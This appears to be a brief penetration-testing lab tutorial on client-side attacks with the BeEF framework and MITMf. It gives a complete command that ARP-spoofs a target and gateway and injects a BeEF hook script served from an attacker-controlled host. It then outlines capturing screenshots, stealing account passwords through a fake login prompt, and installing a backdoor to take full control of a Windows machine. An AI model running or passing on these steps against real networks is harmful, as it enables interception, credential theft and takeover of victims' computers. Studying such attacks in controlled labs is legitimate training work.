CLIENT SIDE ATTACK - BeEF Framework
Hooking targets using MITMF
Tools: MITMF and BeEF
Start BeEF and execute the following commands:
python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hooks
Open any website in the browser on the target machine. You can find injected codes on the source page.
Open BeEF control panels and find the victim online browsers.
Then you can execute the commands to exploit victimized machines.
1. Get screenshots through Spyder Eys.
2. Get account name and password through Pretty Theft.
If a victim fills in the prompted login form, you can get username and password.
3. Gaining full control over Windows Target
Download and install the backdoor file on the target machine, then you can control this computer.